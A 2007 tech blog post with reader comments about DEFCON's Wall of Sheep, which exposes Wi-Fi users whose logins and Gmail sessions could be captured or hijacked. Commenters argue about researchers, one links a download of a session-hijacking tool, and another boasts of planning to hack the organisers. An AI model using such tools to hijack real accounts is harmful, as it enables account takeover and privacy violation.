DEFCON 2007 - Wall of Sheep (shame)

DEFCON 2007 - Wall of Sheep (shame)

Summary: It's time to count sheep again and I don't mean the ones in your sleep.  I'm talking about the ones on the Wi-Fi Hotspot that are using insecure protocols and getting their online accounts compromised.

SHARE:
10

It's time to count sheep again and I don't mean the ones in your sleep.  I'm talking about the ones on the Wi-Fi Hotspot that are using insecure protocols and getting their online accounts compromised.  What you're looking at below is the DEFCON 15 Wall of Sheep.

What do I mean by compromised?  Usually that means username and passwords are being transmitted in the clear for anyone to see or it means your account can be hijacked such that an attacker can get in to your account anytime they want after they copy your online Web session.  In the above screen shot, a VERY large number of Gmail accounts that failed to use secure HTTPS (https://mail.google.com) were hijacked.  This is despite the fact that they logged in using HTTPS because Gmail by default automatically kicks you back in to HTTP mode.

The Wall of Sheep team hunts down the sheep in their command bunker

Robert Graham and David Maynor side-jacking sheep with Hamster

Learn how to protect your online privacy here.

Topics: Collaboration, Google

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

10 comments
Log in or register to join the discussion
  • Not good

    This sense of smug superiority can't end well. It's a useful service, but let's not forget they're compromising the easiest targets first and foremost. Let's keep our perspective, please.

    ...and yet another homage to Maynor? Wow. Just wow. I hear there were actually other security researchers at the event. Don't be too shy to introduce yourself.
    GW Mahoney
    • They were just doing their job of sploitin'

      At least, I think that is what you are to do at DEFCON.
      nucrash
    • GMail, and millions will bennefit

      Whether they are smug or not, do you think Google hasn't already got a team working at making taking over Gmail accounts harder? I would not be surprised if HTTPS became the default soon and users will have no HTTP access soon.

      TripleII
      TripleII-21189418044173169409978279405827
    • Your obsession has to end

      Your obsession with Maynor bashing has to end. Besides, this wasn't a Maynor project. Hamster was a Robert Graham project and it's hardly the entire story here with just one little photo at the bottom of the page.
      georgeou
      • We're still waiting

        You had promised us emails and exposes about how poor Maynor had been slimed by others.
        Robert Crocker
        • That was released back in March

          http://blogs.zdnet.com/Ou/?p=451
          georgeou
        • You may not agree

          And I don't agree either, but George did present his rationale ( http://blogs.zdnet.com/Ou/?p=451 ) and I give him credit for that.

          I didn't think Fox was out of line to publicize the fact that SecureWorks would not confirm the original claims. If someone drops a bomb that any MacBook can be remotely hijacked in 60 seconds, then they claim that their demonstration did not intend to make that claim - in other words, "we didn't say that" - *that* is a retraction. The fact is Maynor or SecureWorks should have confirmed or formally retracted their own assault, but they chose not to.

          Some people went too far, saying Maynor admitted to lying, which he clearly did not do. In the end, since it turned out to be a fraud, they were proved morally right, but it was still irresponsible reporting.

          I say fraud, because the best they could have had was something that was very hard to reproduce, which is not what was presented to Krebs. If fact, that private demo almost had to be rigged, since it worked the first time. However, since his incredible statements, "I didn?t feel the need to do the do the entire hijack", and "This is now a dead subject for me", we should assume the worst of the remaining unanswered questions, which is to say that after months of effort he could not reproduce it on a standard MacBook.

          George may not share my opinion that David is a disgraced researcher, but when I see him or his company being used as a primary source, it's always a jolt.
          GW Mahoney
          • Again, this post has nothing to do with Maynor

            This is a Robert Graham project which he proved on stage and to me when he hijacked some Gmail accounts. The code is being released within a week.
            georgeou
          • Already posted (link)

            I think this is it:

            http://www.erratasec.com/sidejacking.zip

            I wasn't doubting that Robert had done this. I was saying that it's already been done and he was just scripting it. Does this really count as security research?

            I encourage other programmers to comment. My perception is that anyone who's written a bot could do this in one sitting.
            GW Mahoney
  • n3tw0rks4t4n

    I have a hunch that this year, the Wall of Sheep crew are going to end up being the sheep. They will not be able to perform their network plain-text pass scouering duties, once we get ahold of their boxen. They won't know when or wherefrom it hit, nor will their weak distros be able to match our challenge =) here's to hell-acious hacking! n3tw0rks4t4n
    b5981202